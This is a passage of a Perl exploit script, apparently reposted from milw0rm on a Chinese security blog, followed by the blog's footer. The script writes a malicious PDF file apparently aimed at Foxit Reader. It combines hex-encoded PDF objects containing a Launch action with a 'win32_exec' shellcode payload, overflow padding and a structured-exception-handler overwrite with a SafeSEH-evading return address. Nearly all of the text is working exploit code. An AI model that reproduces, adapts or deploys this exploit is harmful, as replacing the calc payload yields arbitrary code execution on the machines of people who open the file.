"\x00\xBD\x52\x0D\x43\x0D\x0A\x65\x6E\x64\x73\x74\x72\x65\x61\x6D\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x39\x20\x30\x20\x6F\x62". 	        "\x6A\x0D\x0A\x3C\x3C\x2F\x54\x79\x70\x65\x2F\x41\x6E\x6E\x6F\x74\x2F\x53\x75\x62\x74\x79\x70\x65\x2F\x53\x63\x72\x65\x65\x6E\x2F". 	        "\x50\x20\x31\x20\x30\x20\x52\x20\x2F\x4D\x28\x44\x3A\x32\x30\x30\x39\x30\x32\x31\x39\x31\x34\x34\x37\x35\x36\x2D\x30\x32\x27\x30". 	        "\x30\x27\x29\x2F\x46\x20\x34\x2F\x52\x65\x63\x74\x5B\x20\x32\x30\x35\x2E\x31\x35\x33\x20\x38\x30\x36\x2E\x31\x38\x32\x20\x33\x33". 	        "\x35\x2E\x32\x39\x31\x20\x38\x33\x33\x2E\x34\x37\x32\x5D\x2F\x42\x53\x3C\x3C\x2F\x53\x2F\x53\x2F\x57\x20\x31\x3E\x3E\x2F\x42\x45". 	        "\x3C\x3C\x2F\x53\x2F\x53\x3E\x3E\x2F\x4D\x4B\x3C\x3C\x2F\x42\x43\x5B\x20\x30\x20\x30\x20\x31\x5D\x2F\x52\x20\x30\x2F\x49\x46\x3C". 	        "\x3C\x2F\x53\x57\x2F\x41\x2F\x53\x2F\x41\x2F\x46\x42\x20\x66\x61\x6C\x73\x65\x2F\x41\x5B\x20\x30\x2E\x35\x20\x30\x2E\x35\x5D\x3E". 	        "\x3E\x3E\x3E\x2F\x41\x50\x3C\x3C\x2F\x4E\x20\x31\x30\x20\x30\x20\x52\x20\x3E\x3E\x2F\x54\x28\x63\x75\x61\x6C\x71\x75\x69\x65\x72". 	        "\x61\x29\x2F\x41\x20\x31\x32\x20\x30\x20\x52\x20\x2F\x41\x41\x20\x31\x37\x20\x30\x20\x52\x20\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62". 	        "\x6A\x0D\x0A\x32\x35\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x54\x79\x70\x65\x2F\x41\x6E\x6E\x6F\x74\x2F\x53\x75\x62\x74\x79". 	        "\x70\x65\x2F\x50\x6F\x70\x75\x70\x2F\x50\x20\x31\x20\x30\x20\x52\x20\x2F\x4D\x28\x44\x3A\x32\x30\x30\x39\x30\x32\x31\x39\x31\x34". 	        "\x34\x38\x31\x35\x2D\x30\x32\x27\x30\x30\x27\x29\x2F\x46\x20\x32\x38\x2F\x52\x65\x63\x74\x5B\x20\x30\x20\x30\x20\x30\x20\x30\x5D". 	        "\x2F\x4F\x70\x65\x6E\x20\x66\x61\x6C\x73\x65\x2F\x50\x61\x72\x65\x6E\x74\x20\x32\x34\x20\x30\x20\x52\x20\x3E\x3E\x0D\x0A\x65\x6E". 	        "\x64\x6F\x62\x6A\x0D\x0A\x32\x34\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x53\x75\x62\x74\x79\x70\x65\x2F\x46\x72\x65\x65\x54". 	        "\x65\x78\x74\x2F\x52\x65\x63\x74\x5B\x20\x32\x38\x35\x20\x37\x39\x34\x20\x35\x34\x31\x20\x38\x32\x37\x5D\x2F\x46\x20\x34\x2F\x41". 	        "\x50\x20\x31\x39\x20\x30\x20\x52\x20\x2F\x46\x6F\x78\x69\x74\x54\x61\x67\x20\x32\x33\x20\x30\x20\x52\x20\x2F\x50\x20\x31\x20\x30". 	        "\x20\x52\x20\x2F\x50\x6F\x70\x75\x70\x20\x32\x35\x20\x30\x20\x52\x20\x2F\x46\x4E\x28\x48\x65\x6C\x76\x65\x74\x69\x63\x61\x29\x2F". 	        "\x43\x6F\x6E\x74\x65\x6E\x74\x73\x28\x45\x64\x69\x74\x65\x64\x20\x62\x79\x20\x46\x6F\x78\x69\x74\x20\x52\x65\x61\x64\x65\x72\x5C". 	        "\x72\x43\x6F\x70\x79\x72\x69\x67\x68\x74\x5C\x28\x43\x5C\x29\x20\x62\x79\x20\x46\x6F\x78\x69\x74\x20\x53\x6F\x66\x74\x77\x61\x72". 	        "\x65\x20\x43\x6F\x6D\x70\x61\x6E\x79\x2C\x32\x30\x30\x35\x2D\x32\x30\x30\x38\x5C\x72\x46\x6F\x72\x20\x45\x76\x61\x6C\x75\x61\x74". 	        "\x69\x6F\x6E\x20\x4F\x6E\x6C\x79\x2E\x5C\x72\x29\x2F\x42\x4B\x43\x20\x36\x35\x35\x33\x35\x2F\x51\x20\x30\x2F\x44\x41\x28\x2F\x5A". 	        "\x69\x54\x69\x20\x31\x31\x20\x54\x66\x20\x31\x20\x30\x20\x30\x20\x72\x67\x20\x31\x20\x30\x20\x30\x20\x31\x20\x32\x38\x35\x20\x38". 	        "\x31\x30\x2E\x35\x20\x54\x6D\x20\x30\x20\x54\x63\x20\x31\x30\x30\x20\x54\x7A\x29\x2F\x49\x54\x2F\x46\x72\x65\x65\x54\x65\x78\x74". 	        "\x54\x79\x70\x65\x77\x72\x69\x74\x65\x72\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x32\x33\x20\x30\x20\x6F\x62\x6A\x0D\x0A". 	        "\x3C\x3C\x2F\x54\x65\x78\x74\x4D\x61\x74\x72\x69\x78\x5B\x20\x31\x20\x30\x20\x30\x20\x31\x20\x32\x38\x35\x20\x38\x31\x30\x2E\x35". 	        "\x5D\x2F\x4C\x69\x63\x65\x6E\x73\x65\x28\x45\x76\x61\x6C\x75\x61\x74\x69\x6F\x6E\x29\x2F\x4D\x65\x6E\x64\x65\x72\x46\x6C\x61\x67". 	        "\x28\x45\x76\x61\x6C\x75\x61\x74\x69\x6F\x6E\x2C\x41\x4E\x4E\x4F\x54\x29\x2F\x46\x6F\x6E\x74\x4E\x61\x6D\x65\x28\x48\x65\x6C\x76". 	        "\x65\x74\x69\x63\x61\x29\x2F\x46\x6F\x6E\x74\x53\x69\x7A\x65\x20\x31\x31\x2F\x54\x65\x78\x74\x28\x45\x64\x69\x74\x65\x64\x20\x62". 	        "\x79\x20\x46\x6F\x78\x69\x74\x20\x52\x65\x61\x64\x65\x72\x5C\x72\x43\x6F\x70\x79\x72\x69\x67\x68\x74\x5C\x28\x43\x5C\x29\x20\x62". 	        "\x79\x20\x46\x6F\x78\x69\x74\x20\x53\x6F\x66\x74\x77\x61\x72\x65\x20\x43\x6F\x6D\x70\x61\x6E\x79\x2C\x32\x30\x30\x35\x2D\x32\x30". 	        "\x30\x38\x5C\x72\x46\x6F\x72\x20\x45\x76\x61\x6C\x75\x61\x74\x69\x6F\x6E\x20\x4F\x6E\x6C\x79\x2E\x5C\x72\x29\x2F\x43\x68\x61\x72". 	        "\x43\x6F\x6C\x6F\x72\x20\x32\x35\x35\x2F\x43\x68\x61\x72\x53\x70\x61\x63\x65\x20\x30\x2F\x4C\x69\x6E\x65\x46\x65\x65\x64\x20\x30". 	        "\x2F\x48\x6F\x72\x7A\x53\x63\x61\x6C\x65\x20\x31\x30\x30\x2F\x4F\x72\x69\x67\x69\x6E\x58\x20\x32\x38\x35\x2F\x4F\x72\x69\x67\x69". 	        "\x6E\x59\x20\x38\x31\x36\x2F\x62\x43\x68\x61\x6E\x67\x65\x42\x6F\x78\x20\x30\x2F\x42\x6F\x78\x57\x69\x64\x74\x68\x20\x32\x35\x36". 	        "\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x32\x32\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x4D\x79\x46\x6F\x6E\x74\x20". 	        "\x31\x38\x20\x30\x20\x52\x20\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x32\x31\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F". 	        "\x46\x6F\x6E\x74\x20\x32\x32\x20\x30\x20\x52\x20\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x32\x30\x20\x30\x20\x6F\x62\x6A". 	        "\x0D\x0A\x3C\x3C\x2F\x4C\x65\x6E\x67\x74\x68\x20\x31\x36\x38\x2F\x53\x75\x62\x74\x79\x70\x65\x2F\x46\x6F\x72\x6D\x2F\x42\x42\x6F". 	        "\x78\x5B\x20\x32\x38\x35\x20\x37\x39\x34\x20\x35\x34\x31\x20\x38\x32\x37\x5D\x2F\x52\x65\x73\x6F\x75\x72\x63\x65\x73\x20\x32\x31". 	        "\x20\x30\x20\x52\x20\x2F\x46\x69\x6C\x74\x65\x72\x2F\x46\x6C\x61\x74\x65\x44\x65\x63\x6F\x64\x65\x3E\x3E\x73\x74\x72\x65\x61\x6D". 	        "\x0D\x0A\x78\x9C\x95\x8D\xCD\x0E\x82\x30\x10\x84\xEF\x7D\x8A\x3D\x42\xA2\xD8\x16\x88\x78\x15\xE1\x66\x4C\xB4\x2F\x50\x43\xC1\x1A". 	        "\xE8\x92\xA6\xFE\xF4\xED\x25\x24\x28\x89\x27\xF6\x30\x99\x99\x6C\xBE\xD9\x0B\xB2\x39\xFA\x12\x8D\x03\xC6\x40\xD4\x84\x45\x74\x3C". 	        "\xA0\x7F\xC6\x36\x84\xC1\x90\x81\x01\xCF\xD2\xA9\xDD\xEE\x92\xC9\x8A\x8E\x7C\x9F\x79\x12\xC5\x9C\x51\x3A\x40\x0F\x24\x28\x2A\xED". 	        "\x54\x05\x57\x0F\x25\xBE\xB5\x83\xB3\x92\x95\xB2\x21\x88\xFB\x02\x24\x8B\xE7\xC8\x1C\x7B\x6F\x75\x73\x73\x41\x1E\xFE\xC0\x17\xAC". 	        "\xDD\x4B\x5A\x05\x39\x76\xBD\x34\x7E\xC5\x29\x4D\xD7\x83\x64\x0B\xC7\xF8\x7C\xAB\x44\x0B\xC5\x53\xB6\x0F\xE9\x34\x1A\x38\x99\xD6". 	        "\x47\x23\xAF\x10\xE4\x03\x4A\x14\x4C\x32\x0D\x0A\x65\x6E\x64\x73\x74\x72\x65\x61\x6D\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x31". 	        "\x39\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x4E\x20\x32\x30\x20\x30\x20\x52\x20\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D". 	        "\x0A\x31\x38\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x54\x79\x70\x65\x2F\x46\x6F\x6E\x74\x2F\x53\x75\x62\x74\x79\x70\x65\x2F". 	        "\x54\x79\x70\x65\x31\x2F\x42\x61\x73\x65\x46\x6F\x6E\x74\x2F\x48\x65\x6C\x76\x65\x74\x69\x63\x61\x2F\x45\x6E\x63\x6F\x64\x69\x6E". 	        "\x67\x2F\x57\x69\x6E\x41\x6E\x73\x69\x45\x6E\x63\x6F\x64\x69\x6E\x67\x2F\x46\x78\x54\x61\x67\x20\x31\x3E\x3E\x0D\x0A\x65\x6E\x64". 	        "\x6F\x62\x6A\x0D\x0A\x31\x37\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x50\x56\x20\x31\x36\x20\x30\x20\x52\x20\x3E\x3E\x0D\x0A". 	        "\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x31\x36\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x54\x79\x70\x65\x2F\x41\x63\x74\x69\x6F\x6E". 	        "\x2F\x53\x2F\x4C\x61\x75\x6E\x63\x68\x2F\x46\x3C\x3C\x2F\x46\x28\x2F\x43\x2F"; my $pdf_data2 = "\x29\x3E\x3E\x2F\x4E\x65\x77\x57\x69\x6E\x64\x6F\x77\x20\x74\x72\x75\x65\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x78\x72". 	        "\x65\x66\x0D\x0A\x30\x20\x32\x36\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x20\x36\x35\x35\x33\x36\x20\x66\x0D\x0A\x30\x30". 	        "\x30\x30\x30\x30\x30\x30\x31\x37\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x31\x39\x37\x20\x30\x30\x30". 	        "\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x33\x31\x34\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30". 	        "\x30\x33\x33\x36\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x34\x33\x32\x20\x30\x30\x30\x30\x30\x20\x6E". 	        "\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x34\x36\x38\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x35\x32\x32". 	        "\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x36\x31\x39\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30". 	        "\x30\x30\x30\x30\x31\x33\x37\x30\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x31\x31\x34\x37\x20\x30\x30\x30". 	        "\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x31\x30\x38\x38\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30". 	        "\x31\x30\x31\x35\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x39\x36\x32\x20\x30\x30\x30\x30\x30\x20\x6E". 	        "\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x38\x37\x32\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x38\x31\x33". 	        "\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x32\x39\x38\x34\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30". 	        "\x30\x30\x30\x30\x32\x39\x34\x39\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x32\x38\x34\x39\x20\x30\x30\x30". 	        "\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x32\x38\x31\x35\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30". 	        "\x32\x35\x32\x30\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x32\x34\x38\x33\x20\x30\x30\x30\x30\x30\x20\x6E". 	        "\x0D\x0A\x30\x30\x30\x30\x30\x30\x32\x34\x34\x34\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x32\x31\x30\x32". 	        "\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x31\x37\x36\x36\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30". 	        "\x30\x30\x30\x30\x31\x36\x33\x35\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x74\x72\x61\x69\x6C\x65\x72\x0D\x0A\x3C\x3C\x2F\x52\x6F". 	        "\x6F\x74\x20\x37\x20\x30\x20\x52\x20\x2F\x49\x6E\x66\x6F\x20\x38\x20\x30\x20\x52\x20\x2F\x49\x44\x5B\x28\xDF\xB0\x2B\xEC\xF3\x6B". 	        "\xFA\x01\x9C\xBC\x4B\x06\x11\x7C\x78\x79\x29\x28\xDF\xB0\x2B\xEC\xF3\x6B\xFA\x01\x9C\xBC\x4B\x06\x11\x7C\x78\x79\x29\x5D\x2F\x44". 	        "\x6F\x63\x43\x68\x65\x63\x6B\x73\x75\x6D\x2F\x37\x36\x33\x36\x30\x32\x39\x46\x42\x32\x42\x32\x46\x44\x32\x39\x42\x43\x33\x34\x41". 	        "\x42\x43\x33\x32\x43\x46\x34\x35\x42\x38\x46\x2F\x53\x69\x7A\x65\x20\x32\x36\x3E\x3E\x0D\x0A\x73\x74\x61\x72\x74\x78\x72\x65\x66". 	        "\x0D\x0A\x38\x30\x35\x37\x0D\x0A\x25\x25\x45\x4F\x46\x0D\x0A";  # win32_exec -  EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com my $shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34". "\x42\x50\x42\x30\x42\x50\x4b\x58\x45\x44\x4e\x43\x4b\x58\x4e\x37". "\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x41\x4b\x58". "\x4f\x55\x42\x32\x41\x30\x4b\x4e\x49\x44\x4b\x38\x46\x53\x4b\x58". "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c". "\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e". "\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x37\x45\x4e\x4b\x48". "\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x30\x4b\x54". "\x4b\x48\x4f\x55\x4e\x41\x41\x50\x4b\x4e\x4b\x48\x4e\x31\x4b\x38". "\x41\x30\x4b\x4e\x49\x58\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33". "\x42\x4c\x46\x46\x4b\x58\x42\x44\x42\x33\x45\x38\x42\x4c\x4a\x47". "\x4e\x30\x4b\x48\x42\x34\x4e\x50\x4b\x48\x42\x37\x4e\x51\x4d\x4a". "\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x58\x42\x48\x42\x4b". "\x42\x30\x42\x30\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x35\x41\x43". "\x48\x4f\x42\x36\x48\x45\x49\x58\x4a\x4f\x43\x48\x42\x4c\x4b\x37". "\x42\x55\x4a\x36\x50\x37\x4a\x4d\x44\x4e\x43\x47\x4a\x36\x4a\x59". "\x50\x4f\x4c\x38\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x36". "\x4e\x56\x43\x36\x42\x50\x5a";  my $overflow1 = "\x41" x 1346; my $overflow2 = "\x41" x (4096 - (length($shellcode) + 255)); my $overflow3 = "\x41" x 255; my $sehjmp = "SkD"; # ;) my $sehret = "\x64\xee\x1f\x02";     # 0x021fee64 - damn you SafeSEH  open (my $pdf, "> s.pdf"); binmode $pdf; print $pdf $pdf_data1.            $overflow1.$sehjmp.$sehret.$overflow2.$shellcode.$overflow3.            $pdf_data2; close $pdf;

# milw0rm.com [2009-03-11]


发表评论 | 分类:工具收集

© 鬼仔 for 鬼仔's Blog, 2009. | 本文网址:http://huaidan.org/archives/2873.html

相关日志


返回顶部

您可以直接回复此邮件与作者联系,该服务由Feedsky提供技术支持,祝您使用愉快

没有评论:

发表评论